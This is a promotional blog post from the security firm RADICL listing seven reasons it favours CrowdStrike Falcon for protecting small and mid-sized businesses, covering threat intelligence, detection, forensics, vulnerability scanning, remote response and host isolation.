RADICL Blog

7 Reasons Why RADICL (STILL!) Loves CrowdStrike

Written by Chris Petersen | 2024 | 07

RADICL is on a mission to bring enterprise-grade, defense-in-depth cybersecurity to the SMB segment. We prioritize CrowdStrike because it is the proven and trusted leader in endpoint protection, detection, and response for the world's most demanding enterprises and government agencies.

We want our SMB customers to have this same class of protection. Fortunately, we could partner with CrowdStrike to deliver this technology to our customers. Since that partnership began, we have come to fully appreciate the power of CrowdStrike and more deeply understand why they were the best and remain the best.

Following are the 7 principal reasons why we love partnering with CrowdStrike:

#1: Unrivaled Threat Intelligence.

You can only detect and prevent what you know to look for. CrowdStrike’s threat intelligence (TI) capabilities are second to none, apart from nation-state agencies such as the NSA. CrowdStrike has also long been a leader in synthesizing and sharing threat intelligence with the community. CrowdStrike TI is gathered via three distinct and complementary intelligence channels.

Dedicated Threat Intelligence Research

CrowdStrike has a large and dedicated threat research function that employs analysts whose sole job is to proactively identify emerging threat actors and continuously keep abreast of their ever-evolving motivations and techniques. CrowdStrike hires the best to serve this function, often pulling talent from government entities (e.g., AFCYBER, NSA, FBI) directly involved in fighting and defending against nation-state cyber threats.

Incident Response

CrowdStrike has developed a reputation as one of few companies trusted to investigate and respond to high-profile, high-impact incidents affecting the world’s leading corporations and government entities. Responding to these incidents provides unique intelligence on how cybercriminals and Advanced Persistent Threats (APTs) are circumventing defenses and penetrating extremely well-defended organizations.

Extremely Large Global Install Base

CrowdStrike Falcon is the most widely deployed endpoint protection (aka “EPP”) and forensic (aka “EDR”) technology in the world. Its unrivaled breadth of deployment provides visibility into endpoint and server activity across the globe, ensuring emerging malware and attack techniques are quickly identified regardless of geographic source.


#2: Leading Threat Detection Capabilities

CrowdStrike Falcon leverages both behavioral and signature-based methods for detecting malware and attacks. Falcon’s threat detection capabilities are one reason CrowdStrike has been consistently ranked by Gartner and other industry analysts as the overall best EPP/EDR technology in the world. CrowdStrike’s unrivaled threat intelligence, combined with Falcon’s threat detection engine technology, provides the best protection possible from known threats and their techniques.

#3: Custom Threat Detection Rules and Tuning

No one company can know it all, and not all customers are the same. Even though CrowdStrike’s Threat Intelligence is unrivaled, it is not omniscient. RADLabs fills TI gaps that are unique to our individual customers. We conduct weekly hunts into customer environments, looking for novel threats based on our TI. To do this well requires a technology that allows us to leverage our TI and hunt learnings into additional customized and automated detection rules. CrowdStrike’s platform is unique because it allows us to develop and deploy custom threat detection rules for our customers. CrowdStrike’s platform also allows us to tune its detection engine and policies to ensure ideal alignment with business and industry considerations.

#4: Deep Forensic Visibility

Unfortunately, even with the best threat intelligence and best detection engine, threats can slip through. Never-before seen attack techniques (aka “zero-day exploits”) allow sophisticated threat actors to bypass even the best security technologies. Furthermore, threats can emerge from within (aka “insider threats”) or impersonate internal users after being successfully “phished”.

When threats have bypassed defenses and are operating from within, they become much more difficult to detect and block. Eventually indicators of their presence will be raised by CrowdStrike or other threat detection techniques. When this happens, deeper investigation is required. CrowdStrike Falcon provides differentiated real-time visibility into endpoint and server activity that allows security analysts and incident responders to more quickly root out threats operating from within and purge them from customer environments. This visibility includes:

  • Program and process execution
  • File reads, edits, transfers, etc.
  • Command line and PowerShell activity
  • Network connections and DNS requests
  • Registry and program auto-start configuration changes

#5: Vulnerability Intelligence

In addition to preventing threats and providing great forensic visibility, the CrowdStrike agent can interrogate all systems it is installed on and identify open vulnerabilities. This is a capability not all EPP/EDR products have and creates operational and cost efficiency for us and our customers by allowing us to manage and deploy a single agent.

Vulnerability intelligence is critical to RADICL’s ability to help customers manage and shrink their attack surface. We leverage this visibility in our HARDEN feature to ensure critical vulnerabilities (aka “P1s”) are immediately acted on. We also leverage this visibility to incrementally reduce the number of exploitable vulnerabilities across our customer environments, thereby making them harder to attack and compromise successfully.

#6: Real-time Response (RTR) and Host Quarantine

CrowdStrike Falcon includes a powerful capability, not all EPP/EDR products have: the ability to remotely connect to a system in support of incident response and quarantine compromised systems when necessary. Falcon’s Real-time Response (RTR) feature is extremely powerful. It allows our analysts to directly query and interrogate suspect or compromised systems supporting incident investigation and response. We are also able to remotely and safely execute commands and run scripts in support of rapid recovery efforts.

Falcon’s “Host Isolation” feature allows us to quarantine a compromised host from all other hosts within the customer’s network. This ensures a threat actor, who has access to that host, can no longer use it as a jumping-off point to further their goals. It also ensures that automated attacks (e.g., self-propagating malware) can no longer connect to systems around the infected host. This feature along with RTR ensures that our vSOC is able to investigate and respond at the fastest speed possible.

#7: Designed for Managed Operations

CrowdStrike is a pioneer in SaaS cybersecurity software delivery. They have architected and designed a platform and suite of products ideally suited to deliver as managed offerings. Most products aren’t designed and built to be delivered this way. Managed services built on deficient technology lead to poor user experience, higher cost of operations, and, ultimately, a higher price tag for the customer. Worse experience and higher price? No thanks!

Fortunately, CrowdStrike has been deliberately and well-designed to support managed offerings like RADICL. This allows us to quickly and simply onboard and manage our customers while also delivering a highly sophisticated level of cyberthreat protection.

Conclusion

I have been working in cybersecurity my whole professional career. Those who have worked with me know I have incredibly high expectations. CrowdStrike has lived up to those expectations. They have built an incredible product and technology. We expect nothing but the best from ourselves and our partners. We are pleased and fortunate to have CrowdStrike by our side as we best protect our customers.

As CrowdStrike puts is: “One Team. One Fight.”  RADICL is all in. Full stop.